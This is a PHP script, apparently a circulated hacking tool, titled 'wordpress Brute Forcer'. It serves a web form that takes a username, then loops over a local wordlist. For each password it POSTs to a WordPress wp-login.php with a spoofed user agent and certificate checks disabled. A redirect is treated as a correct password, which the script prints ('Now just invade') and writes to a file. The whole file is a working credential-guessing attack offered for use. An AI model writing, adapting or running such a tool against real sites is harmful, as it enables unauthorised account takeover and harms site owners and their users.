wordpress Brute Forcer

<?php
################################
# wordpress Brute Forcer
# Copyright@2009 by ac007 adapted to wordpress by R23k
################################

function setData($email,$pass){

global $vars;

$vars["charset_test"]=urldecode("%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B 4%2C%E6%B0%B4%2C%D0%94%2C%D0%84");

$vars["return_session"]=0;

$vars["log"]=$email;

$vars["pwd"]=trim($pass);

$vars["persistent"]=1;

$vars["charset_test"]=urldecode("%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B 4%2C%E6%B0%B4%2C%D0%94%2C%D0%84");

$vars["login"]="Login";



$data="";

foreach($vars as $key=>$value)

{

$data.=$key."=".urlencode($value)."&";

}

return $data;

}

set_time_limit(0);

ini_set('output_buffering',true);

$dictionary =dirname(__FILE__)."\wordlist.txt";

function CheckItOut($email,$pass)

{

$ret=false;

$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";

$data = setData($email,$pass);

$ch = curl_init('www.site.com/wp-login.php?loggedout=true');

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_ENCODING , "gzip,deflate");

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

curl_setopt($ch, CURLOPT_USERAGENT, $useragent);

curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt');

curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt');

$source=curl_exec($ch);

$info=curl_getinfo($ch);

if($info["redirect_count"]==1)

{

$ret=true;

}


return $ret;

}

echo "<form action=\"index.php\" method=\"post\"><table align=\"center\">

<tr><td colspan=2><b>Enter the Login ...</b></td>

</tr>



<tr><td>Login:</td>

<td><input type=text name=\"log\" id=\"user_login\" value=\"\"></td></tr>

<tr><td>Click go..</td>

<td><input type=\"submit\" value=\"go\"></td></tr>

</table>";

if(isset($_POST['log']))

{

$username =$_POST['log'];

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}

$lines=file($dictionary);

echo "<b>Starting Attack ...</b></br></br>";

sleep(3);

echo "<b>Started Attack, brute force .... </b></br> ";

foreach($lines as $line)

{

$line=str_replace("","",$line);


if(CheckItOut($username,$line))

{

echo "<b>[+] Name: $username , Password: $line - <b>This is the Password : $line</b></br> <b>Now just invade</br>";

$fp=fopen('cookie.txt','w');

fwrite($fp,'successfully pass:'.$line);

exit;

}else{

echo "[-] Name: $username , Password: $line - Wrong Password: $line</br>";

}

}

}



?>